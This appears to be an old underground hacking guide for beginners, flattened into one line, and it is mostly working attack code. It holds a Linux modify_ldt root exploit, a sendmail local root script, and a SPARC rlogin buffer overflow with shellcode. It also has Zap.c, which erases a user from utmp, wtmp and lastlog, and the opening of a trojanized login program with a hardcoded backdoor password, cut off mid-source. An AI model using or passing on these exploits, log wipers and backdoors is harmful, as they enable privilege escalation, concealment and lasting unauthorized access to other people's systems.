?? the newbies-user's guide to hacking.txt
!!!)/* this is a hack of a hack. a valid System.map was needed to get this sploit to werk.. but not any longer.. This sploit will give you root if the modify_ldt bug werks.. which I beleive it does in any kernel before 1.3.20 .. QuantumG*//* original code written by Morten Welinder. * * this required 2 hacks to work on the 1.2.13 kernel that I've tested on: * 1. asm/sigcontext.h does not exist on 1.2.13 and so it is removed. * 2. the _task in the System.map file has no leading underscore. * I am not sure at what point these were changed, if you are * using this on a newer kernel compile with NEWERKERNEL defined. * -ReD */#include <linux/ldt.h>#include <stdio.h>#include <linux/unistd.h>#include <signal.h>#ifdef NEWERKERNEL#include <asm/sigcontext.h>#endif#define __KERNEL__#include <linux/sched.h>#include <linux/module.h>static inline _syscall1(int,get_kernel_syms,struct kernel_sym *,table);static inline _syscall3(int, modify_ldt, int, func, void *, ptr, unsigned long, bytecount)#define KERNEL_BASE 0xc0000000/* ------------------------------------------------------------------------ */static __inline__ unsigned char__farpeek (int seg, unsigned ofs){ unsigned char res; asm ("mov %w1,%%gs ; gs; movb (%2),%%al" : "=a" (res) : "r" (seg), "r" (ofs)); return res;}/* ------------------------------------------------------------------------ */static __inline__ void__farpoke (int seg, unsigned ofs, unsigned char b){ asm ("mov %w0,%%gs ; gs; movb %b2,(%1)" : /* No results. 
*/ : "r" (seg), "r" (ofs), "r" (b));}/* ------------------------------------------------------------------------ */voidmemgetseg (void *dst, int seg, const void *src, int size){ while (size-- > 0) *(char *)dst++ = __farpeek (seg, (unsigned)(src++));}/* ------------------------------------------------------------------------ */voidmemputseg (int seg, void *dst, const void *src, int size){ while (size-- > 0) __farpoke (seg, (unsigned)(dst++), *(char *)src++);}/* ------------------------------------------------------------------------ */intmain (){ int stat, i,j,k; struct modify_ldt_ldt_s ldt_entry; FILE *syms; char line[100]; struct task_struct **task, *taskptr, thistask; struct kernel_sym blah[4096]; printf ("Bogusity checker for modify_ldt system call.\n"); printf ("Testing for page-size limit bug...\n"); ldt_entry.entry_number = 0; ldt_entry.base_addr = 0xbfffffff; ldt_entry.limit = 0; ldt_entry.seg_32bit = 1; ldt_entry.contents = MODIFY_LDT_CONTENTS_DATA; ldt_entry.read_exec_only = 0; ldt_entry.limit_in_pages = 1; ldt_entry.seg_not_present = 0; stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry)); if (stat) /* Continue after reporting error. 
*/ printf ("This bug has been fixed in your kernel.\n"); else { printf ("Shit happens: "); printf ("0xc0000000 - 0xc0000ffe is accessible.\n"); } printf ("Testing for expand-down limit bug...\n"); ldt_entry.base_addr = 0x00000000; ldt_entry.limit = 1; ldt_entry.contents = MODIFY_LDT_CONTENTS_STACK; ldt_entry.limit_in_pages = 0; stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry)); if (stat) { printf ("This bug has been fixed in your kernel.\n"); return 1; } else { printf ("Shit happens: "); printf ("0x00000000 - 0xfffffffd is accessible.\n"); } i = get_kernel_syms(blah); k = i+10; for (j=0; j<i; j++) if (!strcmp(blah[j].name,"current") || !strcmp(blah[j].name,"_current")) k = j; if (k==i+10) { printf("current not found!!!\n"); return(1); } j=k; taskptr = (struct task_struct *) (KERNEL_BASE + blah[j].value); memgetseg (&taskptr, 7, taskptr, sizeof (taskptr)); taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) taskptr); memgetseg (&thistask, 7, taskptr, sizeof (thistask)); if (thistask.pid!=getpid()) { printf("current process not found\n"); return(1); } printf("Current process is %i\n",thistask.pid); taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) thistask.p_pptr); memgetseg (&thistask, 7, taskptr, sizeof (thistask)); if (thistask.pid!=getppid()) { printf("current process not found\n"); return(1); } printf("Parent process is %i\n",thistask.pid); thistask.uid = thistask.euid = thistask.suid = thistask.fsuid = 0; thistask.gid = thistask.egid = thistask.sgid = thistask.fsgid = 0; memputseg (7, taskptr, &thistask, sizeof (thistask)); printf ("Shit happens: parent process is now root process.\n"); return 0;};c.) Other linux versions:Sendmail exploit:#/bin/sh### Hi !# This is exploit for sendmail smtpd bug# (ver. 
8.7-8.8.2 for FreeBSD, Linux and may be other platforms).# This shell script does a root shell in /tmp directory.# If you have any problems with it, drop me a letter.# Have fun !### ----------------------# ---------------------------------------------# ----------------- Dedicated to my beautiful lady ------------------# ---------------------------------------------# ----------------------## Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su###echo 'main() '>>leshka.cecho '{ '>>leshka.cecho ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.cecho '} '>>leshka.c##echo 'main() '>>smtpd.cecho '{ '>>smtpd.cecho ' setuid(0); setgid(0); '>>smtpd.cecho ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.cecho '} '>>smtpd.c##cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c./leshkakill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`rm leshka.c leshka smtpd.c /tmp/smtpdecho "Now type: /tmp/sh"SUNOS:Rlogin exploit:(arghh!)#include <stdio.h>#include <stdlib.h>#include <sys/types.h>#include <unistd.h>#define BUF_LENGTH 8200#define EXTRA 100#define STACK_OFFSET 4000#define SPARC_NOP 0xa61cc013u_char sparc_shellcode[] ="\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13""\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e""\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a""\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc""\x82\x10\x20\x3b\x91\xd4\xff\xff";u_long get_sp(void){ __asm__("mov %sp,%i0 \n");}void main(int argc, char *argv[]){ char buf[BUF_LENGTH + EXTRA]; long targ_addr; u_long *long_p; u_char *char_p; int i, code_length = strlen(sparc_shellcode); long_p = (u_long *) buf; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; char_p = (u_char *) long_p; for (i = 0; i < code_length; i++) *char_p++ = sparc_shellcode[i]; long_p = (u_long *) char_p; targ_addr = get_sp() - STACK_OFFSET; for (i = 0; i < EXTRA / sizeof(u_long); 
i++) *long_p++ = targ_addr; printf("Jumping to address 0x%lx\n", targ_addr); execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0); perror("execl failed");}Want more exploits? Get 'em from other sites (like rootshell,dhp.com/~fyodor, etc...).Step 3: Covering your tracks:______For this you could use lots of programs like zap, utclean, and lots ofothers...Watch out, ALWAYS after you cloaked yourself to see if it worked do a:victim1:~$ who...(crap)...victim1:~$ finger...;as;;sda...victim1:~$w...If you are still not cloaked, look for wtmpx, utmpx and other stuff likethat. The only cloaker (that I know) that erased me even from wtmpx/utmpxwas utclean. But I don't have it right now, so ZAP'll have to do the job./* Title: Zap.c (c) rokK Industries Sequence: 911204.B Syztems: Kompiles on SunOS 4.+ Note: To mask yourself from lastlog and wtmp you need to be root, utmp is go+w on default SunOS, but is sometimes removed. Kompile: cc -O Zap.c -o Zap Run: Zap <Username> Desc: Will Fill the Wtmp and Utmp Entries corresponding to the entered Username. 
It also Zeros out the last login data for the specific user, fingering that user will show 'Never Logged In' Usage: If you cant find a usage for this, get a brain.*/ #include <sys/types.h>#include <stdio.h>#include <unistd.h>#include <fcntl.h>#include <utmp.h>#include <lastlog.h>#include <pwd.h> int f; void kill_tmp(name,who)char *name, *who;{ struct utmp utmp_ent; if ((f=open(name,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); }} void kill_lastlog(who)char *who;{ struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\n",who);} main(argc,argv)int argc;char *argv[];{ if (argc==2) { kill_tmp("/etc/utmp",argv[1]); kill_tmp("/usr/adm/wtmp",argv[1]); kill_lastlog(argv[1]); printf("Zap!\n"); } else printf("Error.\n");}Step 4: Keeping that account._______This usually means that you'll have to install some programs to give youaccess even if the root has killed your account...(DAEMONS!!!) =>|-@ Here is an example of a login daemon from the DemonKit (good job,fellows...)LOOK OUT !!! If you decide to put a daemon, be carefull and modify it's dateof creation. (use touch --help to see how!)/*This is a simple trojanized login program, this was designed for Linuxand will not work without modification on linux. 
It lets you login aseither a root user, or any ordinary user by use of a 'magic password'.It will also prevent the login from being logged into utmp, wtmp, etc.You will effectively be invisible, and not be detected except via 'ps'.*/#define BACKDOOR "password"int krad=0;/* This program is derived from 4.3 BSD software and is subject to the copyright notice below. The port to HP-UX has been motivated by the incapability of 'rlogin'/'rlogind' as per HP-UX 6.5 (and 7.0) to transfer window sizes. Changes: - General HP-UX portation. Use of facilities not available in HP-UX (e.g. setpriority) has been eliminated. Utmp/wtmp handling has been ported. - The program uses BSD command line options to be used in connection with e.g. 'rlogind' i.e. 'new login'. - HP features left out: logging of bad login attempts in /etc/btmp, they are sent to syslog password expiry '*' as login shell, add it if you need it - BSD features left out: quota checks password expiry analysis of terminal type (tset feature) - BSD features thrown in: Security logging to syslogd. This requires you to have a (ported) syslog system -- 7.0 comes with syslog 'Lastlog' feature. - A lot of nitty gritty details has been adjusted in favour of HP-UX, e.g. /etc/securetty, default paths and the environment variables assigned by 'login'. - We do *nothing* to setup/alter tty state, under HP-UX this is to be done by getty/rlogind/telnetd/some one else. Michael Glad (glad@daimi.dk) Computer Science Department Aarhus University Denmark 1990-07-04 1991-09-24 glad@daimi.aau.dk: HP-UX 8.0 port: - now explictly sets non-blocking mode on descriptors - strcasecmp is now part of HP-UX 1992-02-05 poe@daimi.aau.dk: Ported the stuff to Linux 0.12 From 1992 till now (1995) this code for Linux has been maintained at ftp.daimi.aau.dk:/pub/linux/poe/*/ /* * Copyright (c) 1980, 1987, 1988 The Regents of the University of California. * All rights reserved. 
* * Redistribution and use in source and binary forms are permitted * provided that the above copyright notice and this paragraph are * duplicated in all such forms and that any documentation, * advertising materials, and other materials related to such * distribution and use acknowledge that the software was developed * by the University of California, Berkeley. The name of the * University may not be used to endorse or promote products derived * from this software without specific prior written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED * WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE. */#ifndef lintchar copyright[] ="@(#) Copyright (c) 1980, 1987, 1988 The Regents of the University of California.\n\ All rights reserved.\n";#endif /* not lint */#ifndef lintstatic char sccsid[] = "@(#)login.c 5.40 (Berkeley) 5/9/89";#endif /* not lint *//* * login [ name ] * login -h hostname (for telnetd, etc.) * login -f name (for pre-authenticated login: datakit, xterm, etc.) *//* #define TESTING */#ifdef TESTING#include "param.h"#else#include <sys/param.h>#endif#include <ctype.h>#include <unistd.h>#include <getopt.h>#include <memory.h>#include <sys/stat.h>#include <sys/time.h>#include <sys/resource.h>#include <sys/file.h>#include <termios.h>#include <string.h>#define index strchr#define rindex strrchr#include <sys/ioctl.h>#include <signal.h>#include <errno.h>#include <grp.h>#include <pwd.h>